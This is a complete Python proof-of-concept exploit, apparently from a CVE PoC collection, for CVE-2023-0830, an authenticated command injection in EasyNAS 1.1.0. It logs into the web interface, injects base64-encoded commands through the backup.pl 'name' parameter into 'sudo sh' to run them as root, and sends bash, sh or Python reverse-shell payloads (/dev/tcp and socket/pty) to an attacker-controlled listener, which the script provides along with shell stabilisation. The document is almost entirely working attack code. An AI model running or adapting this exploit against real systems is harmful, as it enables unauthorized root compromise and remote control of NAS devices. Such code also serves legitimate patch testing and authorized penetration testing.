4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2023-0830.py PY
#!/usr/bin/env python3

import requests
import argparse
import sys
import base64
import urllib.parse
import time
import re
import socket
import threading
import select
import termios
import tty
import os
import random
import string
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Silence urllib3's InsecureRequestWarning; the requests issued by this script
# are sent with certificate verification turned off.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Module-wide verbosity flag: read by log_verbose(), set by main() from --verbose.
verbose = False

def log_info(message):
    """Print *message* to stdout with the informational ``[i]`` prefix."""
    print("[i] {}".format(message))

def log_success(message):
    """Print *message* to stdout with the success ``[+]`` prefix."""
    print("[+] {}".format(message))

def log_error(message):
    """Print *message* to stdout with the error ``[-]`` prefix."""
    print("[-] {}".format(message))

def log_verbose(message):
    """Print *message* with the ``[v]`` prefix, but only when the module-level
    ``verbose`` flag is truthy; otherwise do nothing."""
    if not verbose:
        return
    print("[v] {}".format(message))

def login(url, username, password, protocol="https", skip_verify=True):
    """Log in to the EasyNAS web interface and return the authenticated session.

    Args:
        url: Target host (optionally ``host:port``) without a scheme.
        username: Value sent in the ``usr`` form field.
        password: Value sent in the ``pwd`` form field.
        protocol: ``"https"`` or ``"http"``. When an ``"https"`` attempt fails
            with an SSL or connection error, the login is retried once over
            ``"http"``.
        skip_verify: When true, certificate verification is disabled on the
            session.

    Returns:
        The ``requests.Session`` used for the login, or ``None`` when the
        response still contains the login page or the request failed. This
        function logs failures instead of raising.

    NOTE: the HTTP fallback is not reported back to the caller; a caller that
    keeps using its own ``protocol`` value for later requests will not follow
    the fallback.
    """
    log_info(f"Attempting to login as {username} at {protocol}://{url}...")

    session = None
    try:
        session = requests.Session()
        session.verify = not skip_verify

        login_url = f"{protocol}://{url}/easynas/login.pl"

        # Field names used by the EasyNAS login form.
        login_data = {
            'usr': username,
            'pwd': password,
            'action': 'login'
        }

        headers = {
            'User-Agent': 'Mozilla/5.0 Gecko/20100101 Firefox/72.0'
        }

        response = session.post(login_url, data=login_data, headers=headers, timeout=5)

        # The server answers a rejected login by serving the login page again.
        if 'Login to EasyNAS' in response.text:
            log_error("Login failed: Invalid credentials or server error")
            session.close()
            return None

        # Anything other than the login page is treated as success.
        log_success("Login successful")
        return session

    except requests.exceptions.ConnectionError as e:
        # requests' SSLError is a ConnectionError subclass, so both transport
        # failures arrive here; only the log wording differs.
        if session is not None:
            session.close()
        if protocol == "https":
            if isinstance(e, requests.exceptions.SSLError):
                log_info("SSL error, trying HTTP instead...")
            else:
                log_info("Connection error, trying HTTP instead...")
            return login(url, username, password, "http", skip_verify)
        # Already on HTTP: previously this path returned None without a message.
        log_error(f"Login failed: {str(e)}")
        return None
    except Exception as e:
        if session is not None:
            session.close()
        log_error(f"Login failed: {str(e)}")
        return None

def execute_command(session, url, command, protocol="https"):
    """Send *command* through the ``name`` parameter of ``backup.pl`` and return its output.

    The command is base64-encoded and embedded in a GET request issued with
    *session* (10 second timeout, certificate verification off). The response
    body is then searched with a list of regular expressions for text following
    the "backup name is invalid" message.

    If none of the patterns yields non-empty text, a second approach is used:
    the command is re-run with its output redirected to a uniquely named file
    under ``/tmp``, the file is read back with ``cat`` in a further request,
    and the same patterns are applied to that response. The temporary file is
    removed only in the branch where output was successfully extracted.

    Args:
        session: Session object providing ``get()`` (as returned by ``login``).
        url: Target host (optionally ``host:port``) without a scheme.
        command: Command line to run.
        protocol: URL scheme to use.

    Returns:
        A string in every case: the extracted output, ``"Error: HTTP status
        code N"`` for a non-200 first response, ``"Command executed, but no
        output was captured"`` when nothing could be extracted, or
        ``"Error: <exception text>"`` if any exception was raised.
    """
    try:
        # Encode the command in base64 - exactly like original exploit
        encoded_cmd = base64.b64encode(command.encode()).decode()
        
        # Construct the exploit URL - EXACTLY as in the original exploit
        exploit_url = f'{protocol}://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{encoded_cmd}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23'
        
        log_verbose(f"Sending request to: {exploit_url}")
        
        # Execute the command
        response = session.get(
            exploit_url, 
            headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, 
            timeout=10, 
            verify=False
        )
        
        if response.status_code != 200:
            return f"Error: HTTP status code {response.status_code}"
            
        # Patterns are tried in order; the first one that captures non-empty
        # text wins. The same list is reused for the read-back response below.
        patterns = [
            re.compile(r'backup name is invalid\s*<br>(.*?)</div>', re.DOTALL),  # Main pattern
            re.compile(r'backup name is invalid\s*<br>(.*?)$', re.DOTALL),       # Alternative pattern
            re.compile(r'backup name is invalid\s*(.*?)</div>', re.DOTALL),      # Fallback pattern
            re.compile(r'<div class="alertbad">(.*?)</div>', re.DOTALL),         # Error message pattern
        ]
        
        # Try all patterns
        for pattern in patterns:
            match = pattern.search(response.text)
            if match:
                output = match.group(1).strip()
                if output:
                    return output
        
        # If no output was captured, try a fallback approach using a temporary file
        # This creates a two-stage approach
        log_verbose("No output captured in response, trying two-stage approach")
        
        # Generate a unique filename from the current epoch second plus a
        # random four-digit number
        tmp_file = f"/tmp/out_{int(time.time())}_{random.randint(1000, 9999)}.txt"
        
        # Execute the command and redirect output (stdout and stderr) to the temporary file
        stage1_cmd = f"{command} > {tmp_file} 2>&1"
        encoded_stage1 = base64.b64encode(stage1_cmd.encode()).decode()
        
        # Construct the exploit URL - exactly as in the original exploit
        stage1_url = f'{protocol}://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{encoded_stage1}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23'
        
        log_verbose(f"Sending stage 1 request to: {stage1_url}")
        
        # Execute the first stage; its response is not inspected
        session.get(
            stage1_url, 
            headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, 
            timeout=10, 
            verify=False
        )
        
        # Now read the temporary file
        read_cmd = f"cat {tmp_file}"
        encoded_read = base64.b64encode(read_cmd.encode()).decode()
        
        # Construct the exploit URL - exactly as in the original exploit
        read_url = f'{protocol}://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{encoded_read}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23'
        
        log_verbose(f"Sending read request to: {read_url}")
        
        # Execute the read command
        read_response = session.get(
            read_url, 
            headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, 
            timeout=10, 
            verify=False
        )
        
        # Try to extract output
        for pattern in patterns:
            match = pattern.search(read_response.text)
            if match:
                output = match.group(1).strip()
                if output:
                    # Clean up the temporary file (this request has no timeout
                    # and runs only on this success path)
                    cleanup_cmd = f"rm -f {tmp_file}"
                    encoded_cleanup = base64.b64encode(cleanup_cmd.encode()).decode()
                    cleanup_url = f'{protocol}://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{encoded_cleanup}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23'
                    session.get(cleanup_url, headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, verify=False)
                    return output
        
        # If we still don't have output, return a generic message
        return "Command executed, but no output was captured"
    except Exception as e:
        # Every failure is reported through the return value rather than raised
        return f"Error: {str(e)}"

class IntegratedListener:
    """Accept one TCP connection and relay it to the local terminal.

    ``start()`` binds, waits for a single connection and hands it to
    ``handle_client()``. That method switches the local terminal to raw mode,
    then relays stdin -> socket on a helper thread and socket -> stdout on the
    calling thread. ``stop()`` restores the terminal and closes both sockets;
    it may be called repeatedly and from another thread.
    """

    def __init__(self, host='0.0.0.0', port=4444):
        """Store the bind address; no socket is created until ``start()``."""
        self.host = host
        self.port = port
        self.socket = None   # listening socket, created by start()
        self.client = None   # accepted connection, set by start()
        self.running = False
        # termios attributes saved by handle_client(); cleared once restored
        self.original_terminal_settings = None
        self.shell_upgraded = False  # not read anywhere in this class

    def start(self):
        """Bind, accept a single connection and serve it until it ends.

        Blocks the calling thread. Errors are logged, not raised, and
        ``stop()`` is always called before returning.
        """
        self.running = True
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

        try:
            self.socket.bind((self.host, self.port))
            self.socket.listen(1)
            log_success(f"Listener started on {self.host}:{self.port}")
            log_info("Waiting for incoming connection...")

            # A short accept timeout lets the loop notice stop() clearing
            # self.running.
            self.socket.settimeout(1)

            while self.running:
                try:
                    self.client, addr = self.socket.accept()
                    log_success(f"Received connection from {addr[0]}:{addr[1]}")
                    self.handle_client()
                    break
                except socket.timeout:
                    continue
                except Exception as e:
                    # A concurrent stop() closes the socket under accept();
                    # that is a deliberate shutdown, not an error worth logging.
                    if self.running:
                        log_error(f"Error accepting connection: {e}")
                    break

        except Exception as e:
            log_error(f"Error starting listener: {e}")
        finally:
            self.stop()

    def stop(self):
        """Stop the listener, restore the terminal and close both sockets.

        Safe to call more than once: each socket is detached from the instance
        before it is closed, and the terminal is only restored the first time.
        """
        self.running = False

        self._reset_terminal()

        # Detach before closing so a repeated or concurrent stop() sees None.
        client, self.client = self.client, None
        server, self.socket = self.socket, None
        for sock in (client, server):
            if sock is None:
                continue
            try:
                sock.close()
            except OSError:
                pass

    def _reset_terminal(self):
        """Restore the terminal settings saved by ``handle_client()``.

        Does nothing when no settings are saved. The saved settings are
        cleared up front so later calls (``stop()`` runs at least twice per
        session) do not run ``stty sane`` / ``reset`` again.
        """
        settings = self.original_terminal_settings
        if not settings:
            return
        self.original_terminal_settings = None

        try:
            # Start on a fresh line before touching terminal modes.
            sys.stdout.write("\n")
            sys.stdout.flush()

            termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)

            # Additional terminal cleanup
            os.system('stty sane')
            os.system('reset')
        except Exception as e:
            log_verbose(f"Error resetting terminal: {e}")

    def handle_client(self):
        """Run the interactive session for the accepted connection.

        Saves the terminal settings, switches to raw mode, sends the terminal
        setup commands, then relays data until the connection closes or an
        error occurs. Always ends by calling ``stop()``.
        """
        if not self.client:
            return

        log_success("Shell connection established!")
        log_info("Interactive shell session started")
        log_info("Type 'exit' or press Ctrl+C to exit")

        # Raw mode forwards keystrokes unmodified; failure here is non-fatal
        # and the session continues in the terminal's current mode.
        try:
            self.original_terminal_settings = termios.tcgetattr(sys.stdin)
            tty.setraw(sys.stdin.fileno())
            os.system('stty -echo')
        except Exception as e:
            log_verbose(f"Error setting terminal to raw mode: {e}")

        try:
            self._fix_remote_terminal()

            # stdin -> socket runs on a daemon thread; socket -> stdout runs here.
            threading.Thread(target=self._send_data, daemon=True).start()
            self._receive_data()
        except KeyboardInterrupt:
            log_info("\nKeyboard interrupt received, closing connection")
        except Exception as e:
            log_error(f"\nError in shell session: {e}")
        finally:
            self.stop()

    def _fix_remote_terminal(self):
        """Send the fixed sequence of terminal setup commands to the client.

        Every send is best-effort: a failed send is skipped and the remaining
        commands are still attempted.
        """
        client = self.client
        if not client:
            return

        time.sleep(0.5)

        # Use the local terminal size, or 24x80 when it cannot be determined.
        try:
            terminal_size = os.get_terminal_size()
            rows = terminal_size.lines
            cols = terminal_size.columns
        except (OSError, ValueError):
            rows = 24
            cols = 80

        # Clear any pending input
        try:
            client.sendall(b"\n")
            time.sleep(0.1)
        except OSError:
            pass

        shell_fix_commands = [
            "\r\n",
            "TERM=xterm-256color\n",
            "export TERM=xterm-256color\n",
            f"stty rows {rows} columns {cols}\n",

            # Method 1: Use script command
            "which script >/dev/null 2>&1 && (script -q /dev/null)\n",

            # Method 2: Use python pty
            "which python3 >/dev/null 2>&1 && python3 -c 'import pty; pty.spawn(\"/bin/bash\")' || which python >/dev/null 2>&1 && python -c 'import pty; pty.spawn(\"/bin/bash\")'\n",

            # Reset CTRL-C handling
            "stty intr ^C\n",
            # Set prompt to something simple and clean
            "PS1='\\$ '\n",
            "clear\n",
            "echo Shell stabilized\n"
        ]

        # Send each command with a small delay
        for cmd in shell_fix_commands:
            try:
                client.sendall(cmd.encode())
                time.sleep(0.2)
            except OSError:
                pass

        # Final cleanup
        try:
            client.sendall(b"clear\n")
        except OSError:
            pass

        time.sleep(0.3)  # Wait for commands to take effect

    def _send_data(self):
        """Forward local stdin to the client until the session stops.

        Runs on a helper thread. Any error ends the loop quietly, because
        ``stop()`` on another thread can close or clear the socket mid-send.
        """
        try:
            while self.running and self.client:
                # Poll so the loop re-checks self.running every 0.1 s.
                r, _, _ = select.select([sys.stdin], [], [], 0.1)
                if r:
                    data = os.read(sys.stdin.fileno(), 1024)
                    if not data:
                        break
                    # sendall: a plain send() may write only part of the data.
                    self.client.sendall(data)
        except Exception as e:
            log_verbose(f"Input forwarding stopped: {e}")

    def _receive_data(self):
        """Copy data from the client to stdout until the connection closes.

        Received bytes are also accumulated in ``buffer`` and scanned for a
        known error message and for shell-prompt markers; when found, extra
        terminal setup commands are sent and the buffer is cleared. Any error
        ends the loop quietly.
        """
        try:
            # Deliberately unbounded: the checks below look at everything
            # received since the last reset, not just the latest chunk.
            buffer = b""
            while self.running and self.client:
                r, _, _ = select.select([self.client], [], [], 0.1)
                if r:
                    data = self.client.recv(1024)
                    if not data:
                        log_info("\nConnection closed by remote host")
                        break

                    buffer += data

                    # Write data to stdout
                    os.write(sys.stdout.fileno(), data)

                    # Look for error messages and handle them
                    if b"cannot set terminal process group" in buffer:
                        time.sleep(0.5)
                        self.client.sendall(b"export TERM=xterm\n")
                        self.client.sendall(b"stty raw -echo\n")
                        self.client.sendall(b"reset\n")
                        time.sleep(0.5)

                        # Try to reset with a clean buffer
                        buffer = b""

                    # If we detect a shell prompt, try to upgrade it
                    if (b"$ " in buffer or b"# " in buffer or b"sh-" in buffer) and b"python" not in buffer:
                        if b"bash" not in buffer and b"pty" not in buffer:
                            time.sleep(0.3)
                            self.client.sendall(b"which python3 && python3 -c 'import pty; pty.spawn(\"/bin/bash\")' || which python && python -c 'import pty; pty.spawn(\"/bin/bash\")'\n")
                            time.sleep(0.3)
                            self.client.sendall(b"export TERM=xterm\n")
                            self.client.sendall(b"stty rows 24 columns 80\n")
                            self.client.sendall(b"clear\n")
                            buffer = b""
        except Exception as e:
            log_verbose(f"Output forwarding stopped: {e}")

def reverse_shell(session, url, listener_ip, listener_port, protocol="https", integrated_listener=False, shell_type="bash"):
    """
    Create a reverse shell connection to the specified listener.

    Args:
        session: Session object providing ``get()`` (as returned by ``login``).
        url: Target host (optionally ``host:port``) without a scheme.
        listener_ip: Address the target should connect back to.
        listener_port: Port the target should connect back to.
        protocol: URL scheme to use.
        integrated_listener: If True, an ``IntegratedListener`` is started on
            ``0.0.0.0:listener_port`` in a daemon thread before the request is
            sent, and a ``listener_ip`` of ``0.0.0.0``, ``127.0.0.1`` or
            ``localhost`` is replaced by the local address of a UDP socket
            connected to 8.8.8.8.
        shell_type: One of ``bash``, ``sh``, ``python``. Only consulted when
            ``integrated_listener`` is True; otherwise the ``/bin/sh`` payload
            is always used.

    Returns:
        False when the local address could not be determined or an unexpected
        exception occurred; True otherwise. Note that True is also returned
        when the request completed without a timeout (logged as a probable
        failure) and when another ``RequestException`` occurred.

    With the integrated listener, a read timeout on the request makes this
    function block until the listener thread exits or Ctrl+C is pressed.
    """
    if integrated_listener:
        # Check if the listener IP is valid for receiving connections
        if listener_ip in ['0.0.0.0', '127.0.0.1', 'localhost']:
            log_info("Using local listener - determining external IP")
            # Try to determine external IP or use default interface
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                s.connect(("8.8.8.8", 80))
                listener_ip = s.getsockname()[0]
                s.close()
                log_success(f"Using {listener_ip} as listener address")
            except:
                log_error("Could not determine external IP")
                log_info("Please specify your actual IP address with --lhost")
                return False
    
        # Start the integrated listener in a separate thread
        listener = IntegratedListener(host='0.0.0.0', port=listener_port)
        listener_thread = threading.Thread(target=listener.start)
        listener_thread.daemon = True
        listener_thread.start()
        
        # Wait a moment for the listener to start
        time.sleep(1)
    
    try:
        log_info(f"Sending reverse shell to {listener_ip}:{listener_port}...")
        
        # Create the reverse shell payload
        if integrated_listener:
            # Choose payload based on shell_type
            if shell_type == "python":
                # Python-based shell with pty support
                python_script = f'''
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("{listener_ip}",{listener_port}))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
import pty
pty.spawn("/bin/bash")
'''
                encoded_script = base64.b64encode(python_script.encode()).decode()
                # Tries python3, then python, then falls back to a bash one-liner
                payload = f"python3 -c \"import base64,sys;exec(base64.b64decode('{encoded_script}').decode())\" || python -c \"import base64,sys;exec(base64.b64decode('{encoded_script}').decode())\" || /bin/bash -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1"
            
            elif shell_type == "bash":
                # Bash reverse shell with some additional settings for better experience
                payload = f"bash -c 'exec bash -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1'"
            
            else:  # sh
                # Basic sh reverse shell
                payload = f"/bin/sh -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1"
        else:
            # Standard shell for normal netcat
            payload = f"/bin/sh -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1"
        
        # Encode the payload in base64 - exactly like original
        payload = base64.b64encode(payload.encode()).decode()
        
        # URL encode the payload - exactly like original
        payload = urllib.parse.quote(payload)
        
        # Construct the exploit URL - EXACTLY as in the original exploit
        # The key part is: echo+{base64_payload}+|+base64+-d+|+sudo+sh+||a+#
        exploit_url = f'{protocol}://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{payload}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23'
        
        log_verbose(f"Sending request to: {exploit_url}")
        
        # Set timeout as in the original exploit
        timeout = 3
        
        try:
            # Try the main reverse shell payload
            log_verbose("Sending reverse shell payload with timeout=" + str(timeout))
            session.get(
                exploit_url, 
                headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, 
                timeout=timeout, 
                verify=False
            )
            # A response within the timeout is reported as a likely failure;
            # execution still continues to the guidance and `return True` below
            log_error("Request completed without timeout - shell may have failed")
        except requests.exceptions.ReadTimeout:
            # This is expected as in the original exploit
            log_success("Timeout occurred as expected - connection should be established")
            
            if integrated_listener:
                # Keep the main thread alive until the listener thread exits
                while listener_thread.is_alive():
                    try:
                        time.sleep(0.5)
                    except KeyboardInterrupt:
                        log_info("\nKeyboard interrupt received, stopping listener")
                        listener.stop()
                        break
                
            return True
        except requests.exceptions.RequestException as e:
            # Other request errors are logged with the success prefix and do
            # not change the return value
            log_success(f"Connection interrupted - check your listener: {e}")
            
        # Give guidance if it doesn't work immediately
        if not integrated_listener:
            log_info("If you don't receive a connection, try these alternatives:")
            log_info("1. Make sure your listener is running: nc -lvnp " + str(listener_port))
            log_info("2. Try using HTTP protocol instead of HTTPS with --protocol http")
            log_info("3. Ensure there are no firewalls blocking the connection")
        
        return True
    except Exception as e:
        log_error(f"Error setting up reverse shell: {str(e)}")
        return False

def main():
    """Command-line entry point: parse arguments, log in and run the chosen mode.

    The target may be given with or without a scheme. An explicit
    ``--protocol`` wins; otherwise a scheme present in the URL is used, and
    ``https`` is the final default. Exits with status 1 when arguments are
    incomplete, the login fails, or ``reverse_shell`` reports failure.
    """
    global verbose

    print(r"""
             EasyNAS 1.1.0 Authenticated Command Injection - CVE-2023-0830
      
                      Created by Ivan Spiridonov (xbz0n)
                             https://xbz0n.sh
    """)

    parser = argparse.ArgumentParser(description='EasyNAS 1.1.0 Authenticated Command Injection Exploit')
    parser.add_argument('url', help='Target URL with or without protocol (e.g., example.com:8080)')
    parser.add_argument('username', help='EasyNAS username')
    parser.add_argument('password', help='EasyNAS password')
    parser.add_argument('--mode', choices=['shell', 'reverse'], default='shell',
                        help='Exploitation mode: shell (integrated reverse shell) or reverse (external listener) (default: shell)')
    parser.add_argument('--lhost', help='IP address for the reverse shell listener (your IP, auto-detected by default)')
    parser.add_argument('--lport', type=int, default=4444, help='Port for the reverse shell listener (default: 4444)')
    # default=None lets us tell "not given" apart from an explicit choice, so a
    # scheme typed in the URL is honoured instead of silently replaced by https.
    parser.add_argument('--protocol', choices=['http', 'https'], default=None,
                        help='Protocol to use (default: scheme from the URL if present, otherwise https)')
    parser.add_argument('--verbose', action='store_true', help='Enable verbose output')
    parser.add_argument('--shell', choices=['bash', 'sh', 'python'], default='bash',
                        help='Specify the shell type to use with integrated listener (default: bash)')

    args = parser.parse_args()

    verbose = args.verbose

    target_url = args.url
    url_scheme = None
    if target_url.startswith(("http://", "https://")):
        log_verbose(f"Stripping protocol from URL: {target_url}")
        url_scheme, _, target_url = target_url.partition("://")
    # A trailing slash would otherwise yield "host//easynas/..." request URLs.
    target_url = target_url.rstrip("/")

    protocol = args.protocol or url_scheme or 'https'

    log_verbose(f"Target URL: {target_url}")
    log_verbose(f"Using protocol: {protocol}")

    if args.mode == 'reverse' and (not args.lhost or not args.lport):
        log_error("External reverse shell requires both --lhost and --lport")
        parser.print_help()
        sys.exit(1)

    session = login(target_url, args.username, args.password, protocol)
    if not session:
        sys.exit(1)

    if args.mode == 'shell':
        if not args.lhost:
            # The local address of a UDP socket "connected" to a public IP is
            # the address of the default outbound interface.
            try:
                with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as probe:
                    probe.connect(("8.8.8.8", 80))
                    args.lhost = probe.getsockname()[0]
                log_success(f"Using {args.lhost} as listener address")
            except OSError:
                # reverse_shell() retries detection for this placeholder value.
                args.lhost = '0.0.0.0'

        log_info(f"Starting integrated reverse shell on port {args.lport}")
        succeeded = reverse_shell(session, target_url, args.lhost, args.lport, protocol,
                                  integrated_listener=True, shell_type=args.shell)

    else:  # args.mode == 'reverse' (argparse restricts the choices)
        log_info(f"Sending reverse shell to external listener at {args.lhost}:{args.lport}")
        log_info("Make sure you have a listener running with: nc -lvnp " + str(args.lport))
        succeeded = reverse_shell(session, target_url, args.lhost, args.lport, protocol,
                                  integrated_listener=False)

    if not succeeded:
        sys.exit(1)

# Run the command-line entry point only when the file is executed as a script,
# not when it is imported.
if __name__ == "__main__":
    main()